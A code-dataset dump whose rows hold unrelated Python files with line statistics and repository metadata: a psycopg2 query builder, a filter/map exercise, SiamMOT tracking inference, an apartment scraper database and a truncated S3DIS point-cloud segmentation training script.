return self.conn.cursor(cursor_name, cursor_factory=cur_cls)
else:
return self.conn.cursor(cursor_factory=cur_cls)
@property
def cursor(self) -> psycopg2.extensions.cursor:
if self._cursor is None:
_cur = self.conn.cursor(cursor_factory=self.cursor_cls)
self._cursor = CursorManager(_cur, close_callback=self._close_callback)
return self._cursor
def all(self, query_mode=QueryMode.DEFAULT) -> Union[Iterable[dict], Iterable[tuple]]:
"""
Executes the current query, and returns an iterable cursor (results are loaded as you iterate the cursor)
Usage:
>>> results = PostgresQueryBuilder('people').all() # Equivalent to ``SELECT * FROM people;``
>>> for r in results:
>>> print(r['first_name'], r['last_name'], r['phone'])
:return Iterable: A cursor which can be iterated using a ``for`` loop, loads rows as you iterate, saving RAM
"""
if self.conn is None:
raise Exception('Please statically set PostgresQueryBuilder.conn to a psycopg2 connection')
# if query_mode == QueryMode.DEFAULT: cursor_cls = self.cursor_cls
# elif query_mode == QueryMode.ROW_DICT: cursor_cls = psycopg2.extras.RealDictCursor
# elif query_mode == QueryMode.ROW_TUPLE: cursor_cls = psycopg2.extras.NamedTupleCursor
if query_mode not in self._cursor_map:
raise AttributeError('query_mode must be one of QueryMode.ROW_DICT or ROW_TUPLE')
with self.query_mode_cursor(query_mode, False) as cur:
cur.execute(self.build_query(), self.where_clauses_values)
return cur.fetchall()
def fetch(self, query_mode=QueryMode.DEFAULT) -> Union[dict, tuple, None]:
"""
Executes the current query, and fetches the first result as a ``dict``.
If there are no results, will return None
:return dict: The query result as a dictionary: {column: value, }
:return None: If no results are found
"""
if self.conn is None:
raise Exception('Please statically set PostgresQueryBuilder.conn to a psycopg2 connection')
if query_mode not in self._cursor_map:
raise AttributeError('query_mode must be one of QueryMode.ROW_DICT or ROW_TUPLE')
with self.query_mode_cursor(query_mode, False) as cur:
cur.execute(self.build_query(), self.where_clauses_values)
return cur.fetchone()
def select_date(self, *args):
"""
Add columns to be returned as an ISO formatted date to the select clause.
Specify as individual args. Do not use 'col AS x'. NOTE: no escaping is used!
example: q.select_date('created_at', 'updated_at')
can also chain: q.select_date('mycol').select_date('othercol')
:param args: date columns to select as individual arguments
:return: QueryBuilder object (for chaining)
"""
self.select_cols += ["""to_char({a}, 'YYYY-MM-DD"T"HH24:MI:SS"Z"') as {a}""".format(a=a) for a in args]
return self
| 42.209756 | 117 | 0.602912 | from typing import Iterable, Union
import psycopg2.extras
import psycopg2.extensions
import logging
from privex.db.base import CursorManager
from privex.db.types import GenericCursor
from privex.db.query.base import BaseQueryBuilder, QueryMode
log = logging.getLogger(__name__)
class PostgresQueryBuilder(BaseQueryBuilder):
Q_PRE_QUERY = "set timezone to 'UTC'; "
Q_DEFAULT_PLACEHOLDER = "%s"
cursor_cls: psycopg2.extensions.cursor
query_mode: QueryMode
@property
def conn(self) -> psycopg2.extensions.connection:
return self.connection
def __init__(self, table: str, connection=None, **kwargs):
super().__init__(table, connection)
self.query_mode = query_mode = kwargs.pop('query_mode', QueryMode.ROW_DICT)
if query_mode == QueryMode.ROW_DICT:
cursor_cls = psycopg2.extras.RealDictCursor
elif query_mode == QueryMode.ROW_TUPLE:
cursor_cls = psycopg2.extras.NamedTupleCursor
else:
raise AttributeError('query_mode must be one of QueryMode.ROW_DICT or ROW_TUPLE')
self.cursor_cls = kwargs.pop('cursor_cls', cursor_cls)
self._cursor_map = {
QueryMode.DEFAULT: self.cursor_cls,
QueryMode.ROW_DICT: psycopg2.extras.RealDictCursor,
QueryMode.ROW_TUPLE: psycopg2.extras.NamedTupleCursor
}
def fetch_next(self, query_mode=QueryMode.ROW_DICT) -> Union[dict, tuple, None]:
if not self._is_executed:
self.execute()
return self.cursor.fetchone()
def query_mode_cursor(self, query_mode: QueryMode, replace_cursor=True, cursor_mgr=True):
_cur = self.get_cursor(cursor_class=self._cursor_map[query_mode])
if cursor_mgr:
_cur = CursorManager(_cur, close_callback=self._close_callback)
if replace_cursor:
try:
self.close_cursor()
except (BaseException, Exception):
pass
self._cursor = _cur
return _cur
def build_query(self) -> str:
return self._build_query()
def get_cursor(self, cursor_name=None, cursor_class=None, *args, **kwargs) -> psycopg2.extensions.cursor:
cur_cls = self.cursor_cls if cursor_class is None else cursor_class
if cursor_name is not None:
return self.conn.cursor(cursor_name, cursor_factory=cur_cls)
else:
return self.conn.cursor(cursor_factory=cur_cls)
@property
def cursor(self) -> psycopg2.extensions.cursor:
if self._cursor is None:
_cur = self.conn.cursor(cursor_factory=self.cursor_cls)
self._cursor = CursorManager(_cur, close_callback=self._close_callback)
return self._cursor
def all(self, query_mode=QueryMode.DEFAULT) -> Union[Iterable[dict], Iterable[tuple]]:
if self.conn is None:
raise Exception('Please statically set PostgresQueryBuilder.conn to a psycopg2 connection')
if query_mode not in self._cursor_map:
raise AttributeError('query_mode must be one of QueryMode.ROW_DICT or ROW_TUPLE')
with self.query_mode_cursor(query_mode, False) as cur:
cur.execute(self.build_query(), self.where_clauses_values)
return cur.fetchall()
def fetch(self, query_mode=QueryMode.DEFAULT) -> Union[dict, tuple, None]:
if self.conn is None:
raise Exception('Please statically set PostgresQueryBuilder.conn to a psycopg2 connection')
if query_mode not in self._cursor_map:
raise AttributeError('query_mode must be one of QueryMode.ROW_DICT or ROW_TUPLE')
with self.query_mode_cursor(query_mode, False) as cur:
cur.execute(self.build_query(), self.where_clauses_values)
return cur.fetchone()
def select_date(self, *args):
self.select_cols += ["""to_char({a}, 'YYYY-MM-DD"T"HH24:MI:SS"Z"') as {a}""".format(a=a) for a in args]
return self
| true | true |
1c3c8a7b692e56e9ce68e06c8731bc55d8172f00 | 1,565 | py | Python | Beginers/Functions/solution/Functions.py | arunkgupta/PythonTrainingExercises | d260cf71298e34b2a18bd11a76f1764ef28677c7 | [
"BSD-3-Clause"
] | 150 | 2015-11-27T14:19:15.000Z | 2019-11-03T18:34:21.000Z | Beginners/Functions/solution/Functions.py | prmohanty/PythonTrainingExercises | 00a2435649fcf53fdafede2d10b40f08463728fe | [
"BSD-3-Clause"
] | 1 | 2015-12-30T11:41:30.000Z | 2015-12-30T11:41:30.000Z | Beginners/Functions/solution/Functions.py | prmohanty/PythonTrainingExercises | 00a2435649fcf53fdafede2d10b40f08463728fe | [
"BSD-3-Clause"
] | 95 | 2015-12-01T18:44:13.000Z | 2019-10-28T16:25:08.000Z | #!/usr/bin/env python
"""Write an equivalent function to the build in filter() function that takes
a function and a single list and returns a new list of elements where the
function evaluates to true.
Call your function _filter().
For example: _filter(lambda x: x > 0, [1,-2, 3,-4])
(the lambda returns True if x is positive) returns:
[1, 3]
Write an equivalent function to the build in map() function that takes
a function and a single sequence and returns a new list of elements where the
function has been applied to each element of the sequence.
Call your function _map().
For example: _map(lambda x: x.upper(), 'abcdef')
returns:
['A', 'B', 'C', 'D', 'E', 'F']
NOTE: You might want to study the Python documentation for what is meant to
happen when the function is None.
Created on Sep 6, 2011
@author: paulross
"""
import sys
import pytest
__author__ = 'Paul Ross'
__date__ = '2011-08-03'
__version__ = '0.1.0'
__rights__ = 'Copyright (c) 2011 Paul Ross. Copyright (c) 2015 AHL.'
def _filter(fn, iterable):
if fn is None:
return [v for v in iterable if v]
return [v for v in iterable if fn(v)]
def _map(fn, iterable):
if fn is None:
return iterable
return [fn(v) for v in iterable]
def test_filter():
seq = [1, -2, 3, -4]
assert(filter(lambda x: x > 0, seq) == _filter(lambda x: x > 0, seq))
def test_map():
seq = 'abcdef'
assert(map(lambda x: x.upper(), seq) == _map(lambda x: x.upper(), seq))
def main():
return pytest.main(__file__)
if __name__ == '__main__':
sys.exit(main())
| 24.453125 | 77 | 0.67476 |
import sys
import pytest
__author__ = 'Paul Ross'
__date__ = '2011-08-03'
__version__ = '0.1.0'
__rights__ = 'Copyright (c) 2011 Paul Ross. Copyright (c) 2015 AHL.'
def _filter(fn, iterable):
if fn is None:
return [v for v in iterable if v]
return [v for v in iterable if fn(v)]
def _map(fn, iterable):
if fn is None:
return iterable
return [fn(v) for v in iterable]
def test_filter():
seq = [1, -2, 3, -4]
assert(filter(lambda x: x > 0, seq) == _filter(lambda x: x > 0, seq))
def test_map():
seq = 'abcdef'
assert(map(lambda x: x.upper(), seq) == _map(lambda x: x.upper(), seq))
def main():
return pytest.main(__file__)
if __name__ == '__main__':
sys.exit(main())
| true | true |
1c3c8acd35a39ee109554ab964e43ce7d532077b | 7,824 | py | Python | siammot/engine/inferencer.py | mondrasovic/siam-mot | f06ce0ba6c80fcfbc3830a38f69c93674d3c74ac | [
"Apache-2.0"
] | null | null | null | siammot/engine/inferencer.py | mondrasovic/siam-mot | f06ce0ba6c80fcfbc3830a38f69c93674d3c74ac | [
"Apache-2.0"
] | null | null | null | siammot/engine/inferencer.py | mondrasovic/siam-mot | f06ce0ba6c80fcfbc3830a38f69c93674d3c74ac | [
"Apache-2.0"
] | null | null | null | import logging
import os
import time
import numpy as np
import torch
from gluoncv.torch.data.gluoncv_motion_dataset.dataset import DataSample
from tqdm import tqdm
from ..data.adapters.augmentation.build_augmentation import \
build_siam_augmentation
from ..data.build_inference_data_loader import build_video_loader
from ..eval.eval_clears_mot import eval_clears_mot
from ..utils.boxlists_to_entities import (
boxlists_to_entities,
convert_given_detections_to_boxlist,
)
def do_inference(
cfg, model, sample: DataSample, transforms=None,
given_detection: DataSample = None
) -> DataSample:
"""
Do inference on a specific video (sample)
:param cfg: configuration file of the model
:param model: a pytorch model
:param sample: a testing video
:param transforms: image-wise transform that prepares
video frames for processing
:param given_detection: the cached detections from other model,
it means that the detection branch is disabled in the
model forward pass
:return: the detection results in the format of DataSample
"""
logger = logging.getLogger(__name__)
model.eval()
gpu_device = torch.device('cuda')
video_loader = build_video_loader(cfg, sample, transforms)
sample_result = DataSample(
sample.id, raw_info=None, metadata=sample.metadata
)
network_time = 0
for (video_clip, frame_id, timestamps) in tqdm(video_loader):
frame_id = frame_id.item()
timestamps = torch.squeeze(timestamps, dim=0).tolist()
video_clip = torch.squeeze(video_clip, dim=0)
frame_detection = None
# used the public provided detection (e.g. MOT17, HiEve)
# the public detection needs to be ingested to DataSample
# the ingested detection has been provided, find the details in
# readme/DATA.md
if given_detection:
frame_detection = given_detection.get_entities_for_frame_num(
frame_id
)
frame_detection = convert_given_detections_to_boxlist(
frame_detection,
sample.width,
sample.height
)
frame_height, frame_width = video_clip.shape[-2:]
frame_detection = frame_detection.resize(
(frame_width, frame_height)
)
frame_detection = [frame_detection.to(gpu_device)]
with torch.no_grad():
video_clip = video_clip.to(gpu_device)
torch.cuda.synchronize()
network_start_time = time.time()
output_boxlists = model(video_clip, given_detection=frame_detection)
torch.cuda.synchronize()
network_time += time.time() - network_start_time
# Resize to original image size and to xywh mode
output_boxlists = [
o.resize([sample.width, sample.height]).convert('xywh')
for o in output_boxlists]
output_boxlists = [o.to(torch.device("cpu")) for o in output_boxlists]
output_entities = boxlists_to_entities(
output_boxlists, frame_id, timestamps
)
for entity in output_entities:
sample_result.add_entity(entity)
logger.info(
'Sample_id {} / Speed {} fps'.format(
sample.id, len(sample) / (network_time)
)
)
return sample_result
class DatasetInference(object):
def __init__(
self, cfg, model, dataset, output_dir, data_filter_fn=None,
public_detection=None, distributed=False
):
self._cfg = cfg
self._transform = build_siam_augmentation(cfg, is_train=False)
self._model = model
self._dataset = dataset
self._output_dir = output_dir
self._distributed = distributed
self._data_filter_fn = data_filter_fn
self._pub_detection = public_detection
self._track_conf = 0.7
self._track_len = 5
self._logger = logging.getLogger(__name__)
self.results = dict()
def _eval_det_ap(self):
from ..eval.eval_det_ap import eval_det_ap
iou_threshold = np.arange(0.5, 0.95, 0.05).tolist()
ap_matrix = eval_det_ap(
self._dataset, self.results,
data_filter_fn=self._data_filter_fn,
iou_threshold=iou_threshold
)
ap = np.mean(ap_matrix, axis=0)
ap_str_summary = "\n"
ap_str_summary += 'Detection AP @[ IoU=0.50:0.95 ] = {:.2f}\n'.format(
np.mean(ap) * 100
)
ap_str_summary += 'Detection AP @[ IoU=0.50 ] = {:.2f}\n'.format(
ap[0] * 100
)
ap_str_summary += 'Detection AP @[ IoU=0.75 ] = {:.2f}\n'.format(
ap[5] * 100
)
return ap, ap_str_summary
def _eval_clear_mot(self):
motmetric, motstrsummary = eval_clears_mot(
self._dataset, self.results,
data_filter_fn=self._data_filter_fn
)
return motmetric, motstrsummary
def _inference_on_video(self, sample):
cache_path = os.path.join(self._output_dir, '{}.json'.format(sample.id))
os.makedirs(os.path.dirname(cache_path), exist_ok=True)
if os.path.exists(cache_path):
sample_result = DataSample.load(cache_path)
else:
given_detection = None
if self._pub_detection:
given_detection = self._pub_detection[sample.id]
sample_result = do_inference(
self._cfg, self._model, sample,
transforms=self._transform,
given_detection=given_detection
)
sample_result.dump(cache_path)
return sample_result
def _postprocess_tracks(self, tracks: DataSample):
"""
post_process the tracks to filter out short and non-confident tracks
:param tracks: un-filtered tracks
:return: filtered tracks that would be used for evaluation
"""
track_ids = set()
for _entity in tracks.entities:
if _entity.id not in track_ids and _entity.id >= 0:
track_ids.add(_entity.id)
filter_tracks = tracks.get_copy_without_entities()
for _id in track_ids:
_id_entities = tracks.get_entities_with_id(_id)
_track_conf = np.mean([_e.confidence for _e in _id_entities])
if len(_id_entities) >= self._track_len \
and _track_conf >= self._track_conf:
for _entity in _id_entities:
filter_tracks.add_entity(_entity)
return filter_tracks
def __call__(self):
# todo: enable the inference in an efficient distributed framework
for (sample_id, sample) in tqdm(self._dataset):
# clean up the memory
self._model.reset_siammot_status()
sample_result = self._inference_on_video(sample)
sample_result = self._postprocess_tracks(sample_result)
self.results.update({sample.id: sample_result})
self._logger.info(
"\n---------------- Start evaluating ----------------\n"
)
motmetric, motstrsummary = self._eval_clear_mot()
self._logger.info(motstrsummary)
# ap, ap_str_summary = self._eval_det_ap()
# self._logger.info(ap_str_summary)
self._logger.info(
"\n---------------- Finish evaluating ----------------\n"
)
| 36.90566 | 81 | 0.595859 | import logging
import os
import time
import numpy as np
import torch
from gluoncv.torch.data.gluoncv_motion_dataset.dataset import DataSample
from tqdm import tqdm
from ..data.adapters.augmentation.build_augmentation import \
build_siam_augmentation
from ..data.build_inference_data_loader import build_video_loader
from ..eval.eval_clears_mot import eval_clears_mot
from ..utils.boxlists_to_entities import (
boxlists_to_entities,
convert_given_detections_to_boxlist,
)
def do_inference(
cfg, model, sample: DataSample, transforms=None,
given_detection: DataSample = None
) -> DataSample:
logger = logging.getLogger(__name__)
model.eval()
gpu_device = torch.device('cuda')
video_loader = build_video_loader(cfg, sample, transforms)
sample_result = DataSample(
sample.id, raw_info=None, metadata=sample.metadata
)
network_time = 0
for (video_clip, frame_id, timestamps) in tqdm(video_loader):
frame_id = frame_id.item()
timestamps = torch.squeeze(timestamps, dim=0).tolist()
video_clip = torch.squeeze(video_clip, dim=0)
frame_detection = None
if given_detection:
frame_detection = given_detection.get_entities_for_frame_num(
frame_id
)
frame_detection = convert_given_detections_to_boxlist(
frame_detection,
sample.width,
sample.height
)
frame_height, frame_width = video_clip.shape[-2:]
frame_detection = frame_detection.resize(
(frame_width, frame_height)
)
frame_detection = [frame_detection.to(gpu_device)]
with torch.no_grad():
video_clip = video_clip.to(gpu_device)
torch.cuda.synchronize()
network_start_time = time.time()
output_boxlists = model(video_clip, given_detection=frame_detection)
torch.cuda.synchronize()
network_time += time.time() - network_start_time
output_boxlists = [
o.resize([sample.width, sample.height]).convert('xywh')
for o in output_boxlists]
output_boxlists = [o.to(torch.device("cpu")) for o in output_boxlists]
output_entities = boxlists_to_entities(
output_boxlists, frame_id, timestamps
)
for entity in output_entities:
sample_result.add_entity(entity)
logger.info(
'Sample_id {} / Speed {} fps'.format(
sample.id, len(sample) / (network_time)
)
)
return sample_result
class DatasetInference(object):
def __init__(
self, cfg, model, dataset, output_dir, data_filter_fn=None,
public_detection=None, distributed=False
):
self._cfg = cfg
self._transform = build_siam_augmentation(cfg, is_train=False)
self._model = model
self._dataset = dataset
self._output_dir = output_dir
self._distributed = distributed
self._data_filter_fn = data_filter_fn
self._pub_detection = public_detection
self._track_conf = 0.7
self._track_len = 5
self._logger = logging.getLogger(__name__)
self.results = dict()
def _eval_det_ap(self):
from ..eval.eval_det_ap import eval_det_ap
iou_threshold = np.arange(0.5, 0.95, 0.05).tolist()
ap_matrix = eval_det_ap(
self._dataset, self.results,
data_filter_fn=self._data_filter_fn,
iou_threshold=iou_threshold
)
ap = np.mean(ap_matrix, axis=0)
ap_str_summary = "\n"
ap_str_summary += 'Detection AP @[ IoU=0.50:0.95 ] = {:.2f}\n'.format(
np.mean(ap) * 100
)
ap_str_summary += 'Detection AP @[ IoU=0.50 ] = {:.2f}\n'.format(
ap[0] * 100
)
ap_str_summary += 'Detection AP @[ IoU=0.75 ] = {:.2f}\n'.format(
ap[5] * 100
)
return ap, ap_str_summary
def _eval_clear_mot(self):
motmetric, motstrsummary = eval_clears_mot(
self._dataset, self.results,
data_filter_fn=self._data_filter_fn
)
return motmetric, motstrsummary
def _inference_on_video(self, sample):
cache_path = os.path.join(self._output_dir, '{}.json'.format(sample.id))
os.makedirs(os.path.dirname(cache_path), exist_ok=True)
if os.path.exists(cache_path):
sample_result = DataSample.load(cache_path)
else:
given_detection = None
if self._pub_detection:
given_detection = self._pub_detection[sample.id]
sample_result = do_inference(
self._cfg, self._model, sample,
transforms=self._transform,
given_detection=given_detection
)
sample_result.dump(cache_path)
return sample_result
def _postprocess_tracks(self, tracks: DataSample):
track_ids = set()
for _entity in tracks.entities:
if _entity.id not in track_ids and _entity.id >= 0:
track_ids.add(_entity.id)
filter_tracks = tracks.get_copy_without_entities()
for _id in track_ids:
_id_entities = tracks.get_entities_with_id(_id)
_track_conf = np.mean([_e.confidence for _e in _id_entities])
if len(_id_entities) >= self._track_len \
and _track_conf >= self._track_conf:
for _entity in _id_entities:
filter_tracks.add_entity(_entity)
return filter_tracks
def __call__(self):
for (sample_id, sample) in tqdm(self._dataset):
self._model.reset_siammot_status()
sample_result = self._inference_on_video(sample)
sample_result = self._postprocess_tracks(sample_result)
self.results.update({sample.id: sample_result})
self._logger.info(
"\n---------------- Start evaluating ----------------\n"
)
motmetric, motstrsummary = self._eval_clear_mot()
self._logger.info(motstrsummary)
self._logger.info(
"\n---------------- Finish evaluating ----------------\n"
)
| true | true |
1c3c8ad81850ae5b4a7fa1ea214bcf1635f63d1c | 422 | py | Python | src/homescraper/db.py | asabellico/homescraper | 2c350f359bdd21eaef56fc3809d4373adde1ca2d | [
"MIT"
] | null | null | null | src/homescraper/db.py | asabellico/homescraper | 2c350f359bdd21eaef56fc3809d4373adde1ca2d | [
"MIT"
] | null | null | null | src/homescraper/db.py | asabellico/homescraper | 2c350f359bdd21eaef56fc3809d4373adde1ca2d | [
"MIT"
] | null | null | null | import sqlalchemy
import dataclasses_sql
from homescraper.datatypes import Apartment
class ApartmentDb:
def __init__(self, db_path):
self.engine = sqlalchemy.create_engine(f'sqlite:///{db_path}')
self.metadata = sqlalchemy.MetaData(self.engine)
self.metadata.reflect()
def add_apartment(self, apartment):
return dataclasses_sql.insert(self.metadata, apartment, check_exists=True) | 32.461538 | 82 | 0.741706 | import sqlalchemy
import dataclasses_sql
from homescraper.datatypes import Apartment
class ApartmentDb:
def __init__(self, db_path):
self.engine = sqlalchemy.create_engine(f'sqlite:///{db_path}')
self.metadata = sqlalchemy.MetaData(self.engine)
self.metadata.reflect()
def add_apartment(self, apartment):
return dataclasses_sql.insert(self.metadata, apartment, check_exists=True) | true | true |
1c3c8b6014ce0b4984adf84fafe8468335b88fa8 | 269 | py | Python | jurisdictions/__init__.py | mapto/CashWash | d10281f88ad881a7d01022a66faff09b9fcc49e6 | [
"MIT"
] | 7 | 2019-01-22T11:13:43.000Z | 2019-02-25T13:12:58.000Z | jurisdictions/__init__.py | mapto/CashWash | d10281f88ad881a7d01022a66faff09b9fcc49e6 | [
"MIT"
] | null | null | null | jurisdictions/__init__.py | mapto/CashWash | d10281f88ad881a7d01022a66faff09b9fcc49e6 | [
"MIT"
] | null | null | null | __all__ = ['statements', 'persistence']
from settings import data_path
from settings import debug
from .statements import get_jurisdictions_statement
from .persistence import get_jurisdiction_code, jurisdiction_by_code
from .persistence import cached_jurisdictions
| 24.454545 | 68 | 0.847584 | __all__ = ['statements', 'persistence']
from settings import data_path
from settings import debug
from .statements import get_jurisdictions_statement
from .persistence import get_jurisdiction_code, jurisdiction_by_code
from .persistence import cached_jurisdictions
| true | true |
1c3c8ba12856c5752722acfb7f7f48a3e460dd5a | 561 | py | Python | app/models.py | xamaan585/News-Bulleting | 3ff0ab545a94c6eef8b536342bd47bc37f70e448 | [
"Unlicense"
] | null | null | null | app/models.py | xamaan585/News-Bulleting | 3ff0ab545a94c6eef8b536342bd47bc37f70e448 | [
"Unlicense"
] | null | null | null | app/models.py | xamaan585/News-Bulleting | 3ff0ab545a94c6eef8b536342bd47bc37f70e448 | [
"Unlicense"
] | null | null | null | class Source:
'''
Source class to define source objects
'''
def __init__(self,id,name,url,description):
self.id = id
self.name = name
self.url = url
self.description = description
class Article:
'''
Article class to define article objects
'''
def __init__(self,image,title,author,description,publicshedAt,url):
self.image = image
self.title = title
self.author = author
self.description = description
self.publicshedAt = publicshedAt
self.url = url | 26.714286 | 71 | 0.614973 | class Source:
def __init__(self,id,name,url,description):
self.id = id
self.name = name
self.url = url
self.description = description
class Article:
def __init__(self,image,title,author,description,publicshedAt,url):
self.image = image
self.title = title
self.author = author
self.description = description
self.publicshedAt = publicshedAt
self.url = url | true | true |
1c3c8bd10751f52f27ffb09b2e9937aacc9e0a85 | 21,610 | py | Python | scripts/train_s3dis.py | PointCloudYC/PointNet-modern.pytorch | 1a0b373fcb21f24b667a0bb4831211da5b92f98d | [
"Apache-2.0"
] | 2 | 2021-05-20T14:36:23.000Z | 2022-02-01T11:33:56.000Z | scripts/train_s3dis.py | PointCloudYC/PointNet-modern.pytorch | 1a0b373fcb21f24b667a0bb4831211da5b92f98d | [
"Apache-2.0"
] | null | null | null | scripts/train_s3dis.py | PointCloudYC/PointNet-modern.pytorch | 1a0b373fcb21f24b667a0bb4831211da5b92f98d | [
"Apache-2.0"
] | null | null | null | """
Distributed training script for semantic segmentation on S3DIS dataset
"""
import os
import sys
import time
from datetime import datetime
import json
import random
import numpy as np
# pytorch
import torch
import torch.nn as nn
from torchvision import transforms
import torch.distributed as dist
from torch.utils.tensorboard import SummaryWriter
from torch.nn.parallel import DistributedDataParallel
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
ROOT_DIR = os.path.dirname(BASE_DIR)
sys.path.append(ROOT_DIR)
# configs and logging
import argparse
from utils.config import config, update_config
from utils.logger import setup_logger
from models import PointNetSemSeg, PointNet2SSGSemSeg, PointNet2MSGSemSeg , get_masked_CE_loss # models/build.py
from datasets import S3DISSemSeg
import datasets.data_utils as d_utils
# metrics and lr scheduler
from utils.util import AverageMeter, s3dis_metrics, sub_s3dis_metrics, s3dis_part_metrics
from utils.lr_scheduler import get_scheduler
def parse_config():
"""load configs including parameters from dataset, model, training, etc.
The basic process is:
- load default settings based on the config dict in the utils/config.py
- update the config dict using yaml file specified by an argparse argument(--cfg argument)
- update the config dict using argparse arguments
Returns:
tuple: (args, config) contains config settings where args is argparse.Namespace object while config is a dict
"""
parser = argparse.ArgumentParser('S3DIS semantic segmentation training')
parser.add_argument('--cfg', type=str, default='project/cfgs/s3dis/pointnet2_msg.yaml', help='config file')
# parser.add_argument('--model_name', type=str, default='', help='model name, pointnet, pointnet2ssg, pointnet2msg')
parser.add_argument('--data_root', type=str, default='data', help='root director of dataset')
parser.add_argument('--num_workers', type=int, default=4, help='num of workers to use')
parser.add_argument('--batch_size', type=int, help='batch_size')
parser.add_argument('--num_points', type=int, help='num_points')
parser.add_argument('--num_steps', type=int, help='num_steps')
parser.add_argument('--base_learning_rate', type=float, help='base learning rate')
parser.add_argument('--weight_decay', type=float, help='weight_decay')
parser.add_argument('--epochs', type=int, help='number of training epochs')
parser.add_argument('--start_epoch', type=int, help='used for resume')
# io
parser.add_argument('--load_path', default='', type=str, metavar='PATH',
help='path to latest checkpoint (default: none)')
parser.add_argument('--print_freq', type=int, default=10, help='print frequency')
parser.add_argument('--save_freq', type=int, default=10, help='save frequency')
parser.add_argument('--val_freq', type=int, default=10, help='val frequency')
parser.add_argument('--log_dir', type=str, default='log', help='log dir [default: log]')
# misc
parser.add_argument("--local_rank", type=int,default=0, help='local rank for DistributedDataParallel')
parser.add_argument("--rng_seed", type=int, default=0, help='manual seed')
args, unparsed = parser.parse_known_args()
# update config dict with the yaml file
update_config(args.cfg)
# update config dict with args arguments
config.data_root = args.data_root
config.num_workers = args.num_workers
config.load_path = args.load_path
config.print_freq = args.print_freq
config.save_freq = args.save_freq
config.val_freq = args.val_freq
config.rng_seed = args.rng_seed
config.local_rank = args.local_rank
model_name = args.cfg.split('.')[-2].split('/')[-1] # model name, e.g., pointnet
# supports: pointnet,pointnet2{ssg,msg}
config.model_name = model_name
current_time = datetime.now().strftime('%Y%m%d%H%M%S') #20210518221044 means 2021, 5.18, 22:10:44
config.log_dir = os.path.join(args.log_dir, 's3dis', f'{model_name}_{int(current_time)}') ## log_dir=log/s3dis/pointnet_time
if args.batch_size:
config.batch_size = args.batch_size
if args.num_points:
config.num_points = args.num_points
if args.num_steps:
config.num_steps = args.num_steps
if args.base_learning_rate:
config.base_learning_rate = args.base_learning_rate
if args.weight_decay:
config.weight_decay = args.weight_decay
if args.epochs:
config.epochs = args.epochs
if args.start_epoch:
config.start_epoch = args.start_epoch
print(args)
print(config)
torch.manual_seed(args.rng_seed)
torch.cuda.manual_seed_all(args.rng_seed)
random.seed(args.rng_seed)
np.random.seed(args.rng_seed)
return args, config
def get_loader(config):
# set the data loader
train_transforms = transforms.Compose([
d_utils.PointcloudToTensor(),
d_utils.PointcloudRandomRotate(x_range=config.x_angle_range, y_range=config.y_angle_range,
z_range=config.z_angle_range),
d_utils.PointcloudScaleAndJitter(scale_low=config.scale_low, scale_high=config.scale_high,
std=config.noise_std, clip=config.noise_clip,
augment_symmetries=config.augment_symmetries),
])
test_transforms = transforms.Compose([
d_utils.PointcloudToTensor(),
])
train_dataset = S3DISSemSeg(input_features_dim=config.input_features_dim,
subsampling_parameter=config.sampleDl, color_drop=config.color_drop,
in_radius=config.in_radius, num_points=config.num_points,
num_steps=config.num_steps, num_epochs=config.epochs,
transforms=train_transforms, split='train')
val_dataset = S3DISSemSeg(input_features_dim=config.input_features_dim,
subsampling_parameter=config.sampleDl, color_drop=config.color_drop,
in_radius=config.in_radius, num_points=config.num_points,
num_steps=config.num_steps, num_epochs=20,
transforms=test_transforms, split='val')
train_sampler = torch.utils.data.distributed.DistributedSampler(train_dataset, shuffle=False)
train_loader = torch.utils.data.DataLoader(train_dataset,
batch_size=config.batch_size,
shuffle=False,
num_workers=config.num_workers,
pin_memory=True,
sampler=train_sampler,
drop_last=True)
val_sampler = torch.utils.data.distributed.DistributedSampler(val_dataset, shuffle=False)
val_loader = torch.utils.data.DataLoader(val_dataset,
batch_size=config.batch_size,
shuffle=False,
num_workers=config.num_workers,
pin_memory=True,
sampler=val_sampler,
drop_last=False)
return train_loader, val_loader
def load_checkpoint(config, model, optimizer, scheduler):
logger.info("=> loading checkpoint '{}'".format(config.load_path))
checkpoint = torch.load(config.load_path, map_location='cpu')
config.start_epoch = checkpoint['epoch'] + 1
model.load_state_dict(checkpoint['model'])
optimizer.load_state_dict(checkpoint['optimizer'])
scheduler.load_state_dict(checkpoint['scheduler'])
logger.info("=> loaded successfully '{}' (epoch {})".format(config.load_path, checkpoint['epoch']))
del checkpoint
torch.cuda.empty_cache()
def save_checkpoint(config, epoch, model, optimizer, scheduler):
logger.info('==> Saving...')
state = {
'config': config,
'model': model.state_dict(),
'optimizer': optimizer.state_dict(),
'scheduler': scheduler.state_dict(),
'epoch': epoch,
}
torch.save(state, os.path.join(config.log_dir, 'current.pth'))
if epoch % config.save_freq == 0:
torch.save(state, os.path.join(config.log_dir, f'ckpt_epoch_{epoch}.pth'))
logger.info("Saved in {}".format(os.path.join(config.log_dir, f'ckpt_epoch_{epoch}.pth')))
def main(config):
train_loader, val_loader = get_loader(config)
n_data = len(train_loader.dataset)
logger.info(f"length of training dataset: {n_data}")
n_data = len(val_loader.dataset)
logger.info(f"length of validation dataset: {n_data}")
if config.model_name == 'pointnet':
model = PointNetSemSeg(config,config.input_features_dim)
elif config.model_name =='pointnet2_ssg':
model = PointNet2SSGSemSeg(config,config.input_features_dim)
elif config.model_name =='pointnet2_msg':
model = PointNet2MSGSemSeg(config,config.input_features_dim)
else:
raise NotImplementedError("error")
# print(model)
criterion = get_masked_CE_loss()
model.cuda()
criterion.cuda()
if config.optimizer == 'sgd':
optimizer = torch.optim.SGD(model.parameters(),
lr=config.batch_size * dist.get_world_size() / 8 * config.base_learning_rate,
momentum=config.momentum,
weight_decay=config.weight_decay)
elif config.optimizer == 'adam':
optimizer = torch.optim.Adam(model.parameters(),
lr=config.base_learning_rate,
weight_decay=config.weight_decay)
elif config.optimizer == 'adamW':
optimizer = torch.optim.AdamW(model.parameters(),
lr=config.base_learning_rate,
weight_decay=config.weight_decay)
else:
raise NotImplementedError(f"Optimizer {config.optimizer} not supported")
scheduler = get_scheduler(optimizer, len(train_loader), config)
# add find_unused_parameters=True to overcome the error "RuntimeError: Expected to have finished reduction in the prior iteration before starting a new one"
model = DistributedDataParallel(model, device_ids=[config.local_rank], broadcast_buffers=False,find_unused_parameters=True)
runing_vote_logits = [np.zeros((config.num_classes, l.shape[0]), dtype=np.float32) for l in
val_loader.dataset.sub_clouds_points_labels]
# optionally resume from a checkpoint
if config.load_path:
assert os.path.isfile(config.load_path)
load_checkpoint(config, model, optimizer, scheduler)
logger.info("==> checking loaded ckpt")
